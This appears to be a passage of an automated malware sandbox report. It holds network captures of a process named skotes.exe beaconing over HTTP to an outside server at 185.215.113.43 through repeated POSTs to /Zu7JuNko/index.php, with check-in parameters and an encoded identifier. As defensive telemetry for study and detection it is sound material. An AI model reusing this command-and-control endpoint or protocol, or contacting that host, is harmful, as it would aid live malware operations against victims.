Oct 24, 2024 08:39:37.368911982 CEST	49996	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:37.369198084 CEST	49995	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:37.369391918 CEST	49996	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:37.374773026 CEST	80	49996	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:38.278177977 CEST	80	49996	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:38.278294086 CEST	49996	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:39.907432079 CEST	49996	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:39.907820940 CEST	49997	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:39.912966013 CEST	80	49996	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:39.913057089 CEST	49996	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:39.913080931 CEST	80	49997	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:39.913160086 CEST	49997	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:39.913351059 CEST	49997	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:39.919522047 CEST	80	49997	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:40.811969042 CEST	80	49997	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:40.812108994 CEST	49997	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:42.315661907 CEST	49997	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:42.316190958 CEST	49998	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:42.321275949 CEST	80	49997	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:42.321352959 CEST	49997	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:42.321528912 CEST	80	49998	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:42.321611881 CEST	49998	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:42.321806908 CEST	49998	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:42.327121973 CEST	80	49998	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:43.239566088 CEST	80	49998	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:43.239705086 CEST	49998	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:44.860466957 CEST	49998	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:44.860852957 CEST	49999	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:44.866270065 CEST	80	49999	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:44.866286039 CEST	80	49998	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:44.866468906 CEST	49998	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:44.866504908 CEST	49999	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:44.866781950 CEST	49999	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:44.872157097 CEST	80	49999	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:45.780369043 CEST	80	49999	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:45.780497074 CEST	49999	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:47.282603025 CEST	49999	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:47.282987118 CEST	50001	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:47.288388014 CEST	80	49999	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:47.288405895 CEST	80	50001	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:47.288547039 CEST	49999	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:47.288669109 CEST	50001	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:47.289036036 CEST	50001	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:47.294363976 CEST	80	50001	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:48.215714931 CEST	80	50001	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:48.215965986 CEST	50001	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:49.844863892 CEST	50001	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:49.845235109 CEST	50002	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:49.850649118 CEST	80	50001	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:49.850716114 CEST	80	50002	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:49.850744009 CEST	50001	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:49.850780010 CEST	50002	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:49.850935936 CEST	50002	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:49.856281996 CEST	80	50002	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:50.839905977 CEST	80	50002	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:50.840029001 CEST	50002	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:52.347618103 CEST	50002	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:52.347958088 CEST	50003	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:52.353213072 CEST	80	50002	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:52.353298903 CEST	80	50003	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:52.353301048 CEST	50002	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:52.353373051 CEST	50003	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:52.353543997 CEST	50003	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:52.358820915 CEST	80	50003	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:53.270018101 CEST	80	50003	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:53.270159960 CEST	50003	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:54.891840935 CEST	50003	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:54.892189980 CEST	50004	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:54.897620916 CEST	80	50003	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:54.897633076 CEST	80	50004	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:54.897767067 CEST	50003	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:54.897764921 CEST	50004	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:54.897938967 CEST	50004	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:54.903233051 CEST	80	50004	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:55.798255920 CEST	80	50004	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:55.798367977 CEST	50004	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:57.329526901 CEST	50004	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:57.329833984 CEST	50005	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:57.335448980 CEST	80	50005	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:57.335464001 CEST	80	50004	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:57.335668087 CEST	50004	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:57.335879087 CEST	50005	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:57.335879087 CEST	50005	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:57.341207027 CEST	80	50005	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:58.253169060 CEST	80	50005	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:58.253298044 CEST	50005	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:59.881609917 CEST	50005	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:59.882189035 CEST	50006	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:59.887506008 CEST	80	50005	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:59.887568951 CEST	50005	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:59.888097048 CEST	80	50006	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:59.888171911 CEST	50006	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:59.888361931 CEST	50006	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:59.894633055 CEST	80	50006	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:00.794399023 CEST	80	50006	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:00.794590950 CEST	50006	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:02.298235893 CEST	50006	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:02.298670053 CEST	50007	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:02.305250883 CEST	80	50007	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:02.305455923 CEST	80	50006	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:02.305474043 CEST	50007	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:02.305520058 CEST	50006	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:02.305821896 CEST	50007	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:02.311064005 CEST	80	50007	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:03.204879045 CEST	80	50007	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:03.205009937 CEST	50007	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:04.832032919 CEST	50007	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:04.832361937 CEST	50008	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:04.837826967 CEST	80	50007	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:04.837857008 CEST	80	50008	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:04.837904930 CEST	50007	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:04.837945938 CEST	50008	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:04.838192940 CEST	50008	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:04.844048023 CEST	80	50008	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:05.755461931 CEST	80	50008	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:05.755609989 CEST	50008	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:07.301141024 CEST	50008	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:07.301392078 CEST	50009	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:07.306807995 CEST	80	50008	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:07.306833982 CEST	80	50009	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:07.306888103 CEST	50008	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:07.306934118 CEST	50009	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:07.307215929 CEST	50009	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:07.312515974 CEST	80	50009	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:08.226078987 CEST	80	50009	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:08.229132891 CEST	50009	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:10.057121992 CEST	50009	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:10.058686018 CEST	50010	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:10.062743902 CEST	80	50009	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:10.062861919 CEST	50009	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:10.064034939 CEST	80	50010	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:10.064119101 CEST	50010	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:10.064454079 CEST	50010	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:10.069823027 CEST	80	50010	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:10.964411020 CEST	80	50010	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:10.964478970 CEST	50010	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:12.471916914 CEST	50010	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:12.472326040 CEST	50011	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:12.477431059 CEST	80	50010	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:12.477502108 CEST	50010	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:12.477597952 CEST	80	50011	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:12.477857113 CEST	50011	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:12.478023052 CEST	50011	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:40:12.483244896 CEST	80	50011	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:13.396465063 CEST	80	50011	185.215.113.43	192.168.2.6
Oct 24, 2024 08:40:13.399405956 CEST	50011	80	192.168.2.6	185.215.113.43

HTTP Request Dependency Graph

185.215.113.43

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49982	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:04.979887962 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 24, 2024 08:39:05.908071995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49983	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:07.465884924 CEST	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Oct 24, 2024 08:39:08.379791975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49984	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:10.006949902 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 24, 2024 08:39:10.918543100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49985	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:12.439724922 CEST	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Oct 24, 2024 08:39:13.345778942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49986	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:14.976119995 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 24, 2024 08:39:15.896683931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49988	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:17.416484118 CEST	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Oct 24, 2024 08:39:18.331567049 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49989	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:19.960088015 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 24, 2024 08:39:20.871769905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49990	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:22.398008108 CEST	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Oct 24, 2024 08:39:23.319698095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49991	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:24.944549084 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 24, 2024 08:39:25.855693102 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49992	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:27.368746996 CEST	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Oct 24, 2024 08:39:28.274848938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49993	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:29.905942917 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 24, 2024 08:39:30.812454939 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49994	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:32.335817099 CEST	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Oct 24, 2024 08:39:33.251482010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49995	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:39:34.882500887 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 24, 2024 08:39:35.783488035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 24 Oct 2024 06:39:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49996	185.215.113.43	80	6768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
